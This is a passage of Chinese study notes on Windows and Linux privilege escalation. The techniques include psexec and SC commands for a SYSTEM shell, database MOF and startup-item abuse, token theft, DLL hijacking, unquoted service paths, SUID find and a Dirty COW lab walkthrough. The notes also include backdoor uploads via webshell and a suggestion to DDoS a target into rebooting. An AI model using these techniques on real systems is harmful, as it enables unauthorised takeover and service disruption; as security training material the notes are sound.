                ></p>
<p>此时就通过该漏洞获取了一个本地系统权限的cmd，可以以system权限执行任意操作。</p>
<h5 id="基于本地环境下的权限提升–AT-amp-SC-amp-PS命令"><a href="#基于本地环境下的权限提升–AT-amp-SC-amp-PS命令" class="headerlink" title="基于本地环境下的权限提升–AT&amp;SC&amp;PS命令"></a>基于本地环境下的权限提升–AT&amp;SC&amp;PS命令</h5><h6 id="AT命令"><a href="#AT命令" class="headerlink" title="AT命令"></a>AT命令</h6><p>主要是针对win2008之前的系统</p>
<p>主要原理是在cmd.exe窗口中使用at命令系统是调用system权限执行的，尽管你只是有管理员权限</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017132716124.png"
                      alt="image-20221017132716124"
                ></p>
<p>表示预定一个程序在13：24分之后执行cmd.exe</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017132731974.png"
                      alt="image-20221017132731974"
                ></p>
<p>在指定时间，打开了cmd.exe表名漏洞成立</p>
<h6 id="SC命令"><a href="#SC命令" class="headerlink" title="SC命令"></a>SC命令</h6><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133007487.png"
                      alt="image-20221017133007487"
                ></p>
<p>表名先创建一个服务名叫syscmd，还有个变量名叫binPath这个变量绑定一个执行cmd的命令</p>
<p>相当于在你的电脑创建一个服务叫做syscmd</p>
<p>然后直接运行这个服务 sc  start  syscmd即可打开cmd</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133335639.png"
                      alt="image-20221017133335639"
                ></p>
<h6 id="PS命令"><a href="#PS命令" class="headerlink" title="PS命令"></a>PS命令</h6><p>下载pstool工具</p>
<p>然后打开cmd执行psexec.exe -accepteula -s -i -d cmd.exe  表示打开cmd</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133804981.png"
                      alt="image-20221017133804981"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017133817690.png"
                      alt="image-20221017133817690"
                ></p>
<p>在打开的cmd中输入whoami，查看可知已获得system权限</p>
<h2 id="MY-amp-MS-amp-ORA等SQL数据库提权"><a href="#MY-amp-MS-amp-ORA等SQL数据库提权" class="headerlink" title="MY&amp;MS&amp;ORA等SQL数据库提权"></a>MY&amp;MS&amp;ORA等SQL数据库提权</h2><p>利用系统溢出漏洞无果的情况下，可以采用数据库提权，但是需要知道数据库提权的前提条件：</p>
<p>​        服务器开启数据库服务及获取到最高权限用户密码 。</p>
<p>​        除了Access数据库外，其他数据库基本都存在数据库提权的可能</p>
<p>在本地或者web环境下都可以进行数据库提权，需要通过端口扫描等，来发现该环境是否具有数据库服务，在这之后需要进行信息收集获得数据库账号密码。</p>
<h3 id="mysql提权"><a href="#mysql提权" class="headerlink" title="mysql提权"></a>mysql提权</h3><p>提权步骤：服务探针—信息收集—提权利用—获得权限</p>
<h6 id="服务探针"><a href="#服务探针" class="headerlink" title="服务探针"></a>服务探针</h6><p>查看是否具有数据库信息，可以利用端口扫描</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017220412136.png"
                      alt="image-20221017220412136"
                ></p>
<p>发现3306端口开放，说明具有MySQL数据库，MySQL数据库的密码存储在date&#x2F;mysql&#x2F;user.MYD文件中的</p>
<h6 id="信息收集（得到密码）"><a href="#信息收集（得到密码）" class="headerlink" title="信息收集（得到密码）"></a>信息收集（得到密码）</h6><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017220602189.png"
                      alt="image-20221017220602189"
                ></p>
<p>脚本爆破和工具爆破的区别：</p>
<p>脚本—本地连接本地（需要上传至目标服务器）</p>
<p>工具—你电脑连接目标服务器</p>
<h6 id="提权利用"><a href="#提权利用" class="headerlink" title="提权利用"></a>提权利用</h6><p>先判断MySQL数据库版本 select version();</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221017222136312.png"
                      alt="image-20221017222136312"
                ></p>
<p>然后再利用已有的webshell进行执行即可</p>
<p>2.MOF提权原理：mof是Windows系统的一个文件，叫做“托管对象格式”，作用是每隔五秒就会去监控进程创建和死亡。就是用MySQL的root权限，然后使用root权限去执行我们上传的mof（要先把原有的mof进行编辑替换）。隔一定时间后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数是cmd的添加管理员用户的命令</p>
<h6 id="提权过程："><a href="#提权过程：" class="headerlink" title="提权过程："></a>提权过程：</h6><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018141950023.png"
                      alt="image-20221018141950023"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018142017899.png"
                      alt="image-20221018142017899"
                ></p>
<p>（一般成功的概率较低，被动提权）</p>
<ol start="3">
<li><p>启动项提权（基于操作系统的自启动功能）</p>
<p>到处一个自定义的可执行文件到启动目录配合重启执行</p>
</li>
</ol>
<p>步骤：</p>
<p>如果数据库没有开启外联，需要通过webshell开启外联</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143352551.png"
                      alt="image-20221018143352551"
                ></p>
<p>开启外联后</p>
<p>使用msf进行提权</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143511965.png"
                      alt="image-20221018143511965"
                ></p>
<p>search mysql 搜索MySQL的exp，并使用use命令进行选择使用</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143628365.png"
                      alt="image-20221018143628365"
                ></p>
<p>设置目标主机的IP地址、用户名、密码</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143802006.png"
                      alt="image-20221018143802006"
                ></p>
<p>用exploit进行执行，启动项创建成功</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018143900873.png"
                      alt="image-20221018143900873"
                ></p>
<p>接下来就是想办法让人家主机重启 ，最常用的就是ddos攻击导致资源枯竭致使服务器自动重启</p>
<h3 id="SQLSever数据库提权"><a href="#SQLSever数据库提权" class="headerlink" title="SQLSever数据库提权"></a>SQLSever数据库提权</h3><p>流程：服务探针—信息收集—提权利用—获得权限</p>
<p>直接获取,被阻止需要开启</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154438279.png"
                      alt="image-20221018154438279"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154122467.png"
                      alt="image-20221018154122467"
                ></p>
<p>开启后，获得system权限</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154647705.png"
                      alt="image-20221018154647705"
                ></p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154146481.png"
                      alt="image-20221018154146481" style="zoom:150%;" 
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018154808146.png"
                      alt="image-20221018154808146" style="zoom:150%;" 
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018155228658.png"
                      alt="image-20221018155228658" style="zoom:150%;" 
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221018155731871.png"
                      alt="image-20221018155731871" style="zoom:150%;" 
                >



<h3 id="Oracle数据库提权"><a href="#Oracle数据库提权" class="headerlink" title="Oracle数据库提权"></a>Oracle数据库提权</h3><h6 id="普通用户模式"><a href="#普通用户模式" class="headerlink" title="普通用户模式"></a>普通用户模式</h6><p>前提是拥有一个普通的oracle连接账号，不需要DBA权限，可以提权至DBS，并以oracle实例运行的权限执行操作系统命令。</p>
<h6 id="DBA用户模式（自动化工具演示）"><a href="#DBA用户模式（自动化工具演示）" class="headerlink" title="DBA用户模式（自动化工具演示）"></a>DBA用户模式（自动化工具演示）</h6><p>拥有DBA账号密码，可以省去自己手动去创建存储过程的繁琐步骤，一键执行测试。</p>
<h6 id="注入提升模式（sqlmap演示测试）"><a href="#注入提升模式（sqlmap演示测试）" class="headerlink" title="注入提升模式（sqlmap演示测试）"></a>注入提升模式（sqlmap演示测试）</h6><p>拥有一个oracle注入点，可以通过注入点直接执行系统命令，此种模式没有实现回显，需要自己验证</p>
<h2 id="Redis-amp-Postgre-amp-令牌窃取-amp-进程注入"><a href="#Redis-amp-Postgre-amp-令牌窃取-amp-进程注入" class="headerlink" title="Redis&amp;Postgre&amp;令牌窃取&amp;进程注入"></a>Redis&amp;Postgre&amp;令牌窃取&amp;进程注入</h2><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019133531100.png"
                      alt="image-20221019133531100"
                ></p>
<h3 id="Redis数据库权限提升"><a href="#Redis数据库权限提升" class="headerlink" title="Redis数据库权限提升"></a>Redis数据库权限提升</h3><p>起因：由于Redis服务配置不当，可被攻击者恶意利用。黑客借助Redis内置命令，可将现有数据恶意清空；如果Redis以root身份运行，黑客可以往服务器上写入SSH公钥文件，直接登入服务器。</p>
<p>连接（利用未授权或者有密码）-利用如下方法提权</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019133947495.png"
                      alt="image-20221019133947495"
                ></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/fly_hps/article/details/80937837" >https://blog.csdn.net/fly_hps/article/details/80937837 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019135019394.png"
                      alt="image-20221019135019394"
                ></p>
<h3 id="postgresql数据库提权"><a href="#postgresql数据库提权" class="headerlink" title="postgresql数据库提权"></a>postgresql数据库提权</h3><p>postgresql数据库是一种关系型数据库。其中9.3到11版本中存在一处特性，管理员或者具有“COPY TO&#x2F;FROM PROGRAM”的用户，可以使用这个特性执行任意命令</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019135525686.png"
                      alt="image-20221019135525686"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019135507395.png"
                      alt="image-20221019135507395"
                ></p>
<h3 id="Windows2008-amp-7令牌窃取提升-本地"><a href="#Windows2008-amp-7令牌窃取提升-本地" class="headerlink" title="Windows2008&amp;7令牌窃取提升-本地"></a>Windows2008&amp;7令牌窃取提升-本地</h3><p>进行全程过程调用时请求提升权限，然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身，还用于原始请求进程时，漏洞就会出现。</p>
<p>流程：获取会话—利用模块—窃取令牌—提权</p>
<p>得先利用msf反弹信息</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019140951226.png"
                      alt="image-20221019140951226"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221019141011052.png"
                      alt="image-20221019141011052"
                ></p>
<h3 id="Windows2003-amp-10注入提升"><a href="#Windows2003-amp-10注入提升" class="headerlink" title="Windows2003&amp;10注入提升"></a>Windows2003&amp;10注入提升</h3><p>进程注入提权是本地提权方式的一种较为老的安全技术了，利用的是注入进程的所有者实现权限共享机制，这类技术主要利用再windows2008之前的操作系统（不包括），所以我们需要学习后续的本地提权更多的手法才能有针对高版本的系统.</p>
<h5 id="win2008之前的系统提权："><a href="#win2008之前的系统提权：" class="headerlink" title="win2008之前的系统提权："></a>win2008之前的系统提权：</h5><p>利用工具</p>
<h5 id="之后："><a href="#之后：" class="headerlink" title="之后："></a>之后：</h5><p>pexec64 工具</p>
<h2 id="烂土豆-amp-dll劫持-amp-引导路径-amp-服务权限—提权"><a href="#烂土豆-amp-dll劫持-amp-引导路径-amp-服务权限—提权" class="headerlink" title="烂土豆&amp;dll劫持&amp;引导路径&amp;服务权限—提权"></a>烂土豆&amp;dll劫持&amp;引导路径&amp;服务权限—提权</h2><h4 id="烂土豆提权"><a href="#烂土豆提权" class="headerlink" title="烂土豆提权"></a>烂土豆提权</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020164246540.png"
                      alt="image-20221020164246540"
                ></p>
<h6 id="烂土豆比热土豆的优点："><a href="#烂土豆比热土豆的优点：" class="headerlink" title="烂土豆比热土豆的优点："></a>烂土豆比热土豆的优点：</h6><p>1.100%可靠</p>
<p>2.全版本通杀</p>
<p>3.立即生效，热土豆需要等待windows更新</p>
<h5 id="烂土豆配合令牌窃取提权-web权限"><a href="#烂土豆配合令牌窃取提权-web权限" class="headerlink" title="烂土豆配合令牌窃取提权-web权限"></a>烂土豆配合令牌窃取提权-web权限</h5><p>过程：上传烂土豆–执行烂土豆–利用窃取模块–窃取system–成功</p>
<p>步骤：</p>
<ol>
<li><p>先下载potato.exe文件并通过webshell上传到靶机中去</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020211128892.png"
                      alt="image-20221020211128892"
                ></p>
</li>
</ol>
<p>2.在msf中先连接到靶机，确保能够反弹shell，然后cd c:\定位到patato.exe的位置</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020211348556.png"
                      alt="image-20221020211348556"
                ></p>
<p>3.输入指令，运行patato.exe</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020211438585.png"
                      alt="image-20221020211438585"
                ></p>
<p>4.然后执行令牌窃取的三步骤，即可获得系统权限</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221020212013343.png"
                      alt="image-20221020212013343"
                ></p>
<h4 id="DLL劫持提权"><a href="#DLL劫持提权" class="headerlink" title="DLL劫持提权"></a>DLL劫持提权</h4><p>需要被攻击主机有特定软件应用及启用配合</p>
<p>原理：Windows。程序启动的时候需要DLL。如果这些DLL不存在，则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常，Windows应用程序有其预定义好的搜索DLL的路径给，它会根据下面的顺序进行搜索：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021135233606.png"
                      alt="image-20221021135233606"
                ></p>
<p>步骤：信息收集—进程调试—制作DLL并上传—替换DLL-启动应用后成功</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021140258406.png"
                      alt="image-20221021140258406"
                ></p>
<p>生成dll文件<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021140358055.png"
                      alt="image-20221021140358055"
                >，用来替换一个第三方软件的dll文件</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021140440660.png"
                      alt="image-20221021140440660"
                ></p>
<p>上面两个文件是可以替换的，因为这个软件运行的时候会调用这两个文件（用火绒剑查看调用情况），随便替换一个都行。（替换的文件名得改成一样的）</p>
<p>打开文件即可监听到窗口</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021142533920.png"
                      alt="image-20221021142533920"
                ></p>
<p>后续就可以利用令牌窃取等进行提权</p>
<h4 id="win2012-不带引号服务路径配合MSF-Web，本地权限"><a href="#win2012-不带引号服务路径配合MSF-Web，本地权限" class="headerlink" title="win2012-不带引号服务路径配合MSF-Web，本地权限"></a>win2012-不带引号服务路径配合MSF-Web，本地权限</h4><p>原理：当windows服务运行时，会发生一下两种情况之一。如果给出了可执行文件，并且引用了完整的路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。</p>
<p>过程：检测引号服务路径（看看有没有引号）—利用路径制作文件并上传–启用服务或重启—调用后成功</p>
<p>原理就是：在一些服务的执行路径中，有些目录没有带引号，这样会使得执行的目录与原来想要执行的目录不同</p>
<p>举个例子：</p>
<p>C:&#x2F;&#x2F;ni  hao&#x2F;jjj.exe</p>
<p>“C:&#x2F;&#x2F;ni  hao&#x2F;jjj.exe”</p>
<p>第一个执行的是ni，第二个才是执行jjj.exe</p>
<p>如果权限够，webshell启动服务的命令sc start 服务名</p>
<p>服务启动则会调用系统权限</p>
<p>所以先用命令查找靶机中（用webshell），没有带引号“”的路径的服务</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021152523741.png"
                      alt="image-20221021152523741" style="zoom:150%;" 
                >

<p>然后查看该服务的路径，并用msf生成一个与服务路径名相同的.exe后门文件，然后通过webshell上传靶机</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021152116172.png"
                      alt="image-20221021152116172"
                ></p>
<p>利用服务启动，则会调用该后门文件，msf反弹shell就生效了.</p>
<h4 id="win2012-不安全服务权限配合msf-本地提权"><a href="#win2012-不安全服务权限配合msf-本地提权" class="headerlink" title="win2012-不安全服务权限配合msf-本地提权"></a>win2012-不安全服务权限配合msf-本地提权</h4><p>原理：一般服务中，即使正确的引用服务路径（引号的那个方法就不行了），但也可能存在其他的漏洞&#x2F;由于管理配置错误，用户可能对服务拥有过多的权限，比如，可以直接修改它导致重定向执行文件。</p>
<p>步骤：检测服务权限配置–制作文件并上传–更改服务路径指向-调用后成功</p>
<p>下载文件：<a class="link"   target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk" >https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>第一条命令利用下载的软件寻找具有administrators权限的服务</p>
<p>第二条命令是改变服务路径，将其引导至msf生成的exe后门文件</p>
<p>第三条命令是执行该服务</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221021154236469.png"
                      alt="image-20221021154236469" style="zoom:150%;" 
                >

<p>这时peogram.exe文件就被执行了，msf就反弹成功</p>
<h4 id="windows提权总结"><a href="#windows提权总结" class="headerlink" title="windows提权总结"></a>windows提权总结</h4><p>掌握：提权方法对应的层面（远程还是本地）、提权方法对应系统版本、相关文件及后门免杀问题等</p>
<h2 id="linux提权"><a href="#linux提权" class="headerlink" title="linux提权"></a>linux提权</h2><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022190138371.png"
                      alt="image-20221022190138371"
                ></p>
<h3 id="linux脏牛内核漏洞"><a href="#linux脏牛内核漏洞" class="headerlink" title="linux脏牛内核漏洞"></a>linux脏牛内核漏洞</h3><h4 id="linux提权自动化脚本利用–4个脚本"><a href="#linux提权自动化脚本利用–4个脚本" class="headerlink" title="linux提权自动化脚本利用–4个脚本"></a>linux提权自动化脚本利用–4个脚本</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022190542244.png"
                      alt="image-20221022190542244"
                ></p>
<p>利用工具的信息收集，得到的信息来判断是否具有提权的可能性</p>
<p>步骤：下载好LinEnum.sh并通过webshell上传到靶机中（一般上传到&#x2F;tmp文件夹中，具有打开的权限）</p>
<p>然后对该文件赋予权限chmod -x</p>
<p>之后运行该文件</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022191955669.png"
                      alt="image-20221022191955669"
                ></p>
<p>得到该系统的各项参数，以便进行后续的提权</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022192137982.png"
                      alt="image-20221022192137982"
                ></p>
<p>SUID里面看是不是有下面图片那些元素，有就可以利用SUID提权</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022195904933.png"
                      alt="image-20221022195904933" style="zoom:150%;" 
                >

<p>其他的工具也是一样的方法</p>
<h4 id="Linux提权SUID配合脚本提权"><a href="#Linux提权SUID配合脚本提权" class="headerlink" title="Linux提权SUID配合脚本提权"></a>Linux提权SUID配合脚本提权</h4><p>漏洞成因：chmod u+s给予了suid      u-s删除了suid</p>
<p>使程序在运行中受到suid root权限的执行过程导致，就是上面那些执行的时候是调用root权限执行，所以可以利用这一特性来实施提权</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022194323506.png"
                      alt="image-20221022194323506" style="zoom:150%;" 
                >

<p>提权过程：探针是否有SUID可以用上图的手工命令，也可以中自动脚本</p>
<p>步骤：</p>
<p>利用msf进行反弹连接，连接三步骤</p>
<p>然后利用upload命令将信息收集工具上传到靶机目录（一般是&#x2F;tmp目录）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022200754775.png"
                      alt="image-20221022200754775"
                ></p>
<p>然后输入shell进行工具的定位及使用</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022200638234.png"
                      alt="image-20221022200638234"
                ></p>
<p>发现SUID FILE具有find字样</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201035132.png"
                      alt="image-20221022201035132"
                ></p>
<p>说明可以利用SUID提权</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201212416.png"
                      alt="image-20221022201212416"
                ></p>
<p>利用上面的指令，先touch +名字  然后find 名字  -exec whoami  ; 即可发现是root权限</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201254320.png"
                      alt="image-20221022201254320" style="zoom:150%;" 
                >

<p>然后利用<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022201600033.png"
                      alt="image-20221022201600033"
                >命令即可反弹一个具有root权限的shell</p>
<p>这时候指令前面就可以省略 find  +名字</p>
<h4 id="Linux提权本地配合内核漏洞提权"><a href="#Linux提权本地配合内核漏洞提权" class="headerlink" title="Linux提权本地配合内核漏洞提权"></a>Linux提权本地配合内核漏洞提权</h4><p>提权过程：连接—获取可利用漏洞—下载或者上传exp—编译exp—给权限执行—提权成功</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022202857938.png"
                      alt="image-20221022202857938"
                ></p>
<p>利用刚才上面所讲的工具利用的方法运行漏洞探针工具</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022203820926.png"
                      alt="image-20221022203820926" style="zoom:150%;" 
                >

<p>找到需要的漏洞，就是最后一个，打开附带的连接将exploits改为download即可下载漏洞，或者直接网上下载文件45010.c文件</p>
<p>将下载好的文件上传上去</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022204141443.png"
                      alt="image-20221022204141443"
                ></p>
<p>然后执行.&#x2F;45010，即可获得root权限</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022204216654.png"
                      alt="image-20221022204216654"
                ></p>
<h4 id="Linux提权脏牛内核漏洞"><a href="#Linux提权脏牛内核漏洞" class="headerlink" title="Linux提权脏牛内核漏洞"></a>Linux提权脏牛内核漏洞</h4><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022204555115.png"
                      alt="image-20221022204555115"
                ></p>
<p>步骤：vulnhub靶机—探针目标—CMS漏洞利用—脚本探针提权漏洞—利用内核提权</p>
<h5 id="脏牛提权靶机演示"><a href="#脏牛提权靶机演示" class="headerlink" title="脏牛提权靶机演示"></a>脏牛提权靶机演示</h5><p>准备工作：先将靶机下载好安装在vm虚拟机上，开启靶机以及一台kali攻击机</p>
<p>利用kali的ifconfig命令查看自己的IP地址以获取靶机的IP网段</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205245255.png"
                      alt="image-20221022205245255"
                ></p>
<p>可知靶机的IP地址处于192.168.76.0&#x2F;24网段，利用nmap扫描网段内的活跃主机，获取IP地址</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205448204.png"
                      alt="image-20221022205448204"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205536430.png"
                      alt="image-20221022205536430"
                ></p>
<p>得到IP地址192.168.76.141，继续对该IP进行端口扫描，发现1898端口</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022205702744.png"
                      alt="image-20221022205702744"
                ></p>
<p>打开192.168.76.141:1898网站发现该网站是基于drupal开发的，下一步便可以网上搜索该框架的漏洞</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210118051.png"
                      alt="image-20221022210118051"  
                >

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210143398.png"
                      alt="image-20221022210143398" style="zoom:200%;" 
                >

<p>或者也可以利用msf的search功能进行漏洞查找</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210236441.png"
                      alt="image-20221022210236441"
                ></p>
<p>利用这个漏洞，就是第四个</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210355497.png"
                      alt="image-20221022210355497"
                ></p>
<p>设置靶机主机及端口获得反弹shell</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210501903.png"
                      alt="image-20221022210501903"
                ></p>
<p>接下来就是要开始提权了</p>
<p>上传漏洞探针工具到靶机，并且验证是否上传成功</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210837819.png"
                      alt="image-20221022210837819" style="zoom:150%;" 
                >

<p>然后利用shell模块执行上传的工具</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022210959042.png"
                      alt="image-20221022210959042" style="zoom:150%;" 
                >	 	 	 		

<p>发现这一个漏洞，俗称脏牛漏洞</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211113039.png"
                      alt="image-20221022211113039" style="zoom:150%;" 
                >

<p>访问给出的连接，下载漏洞<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211342944.png"
                      alt="image-20221022211342944"
                ></p>
<p>下载后上传<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://image-1317166382.cos.ap-nanjing.myqcloud.com/image-20221022211520869.png"
                      alt="image-20221022211520869"
                >上传到对方目录文件重命名为40847.cpp</p>
<img  
                     lazyload
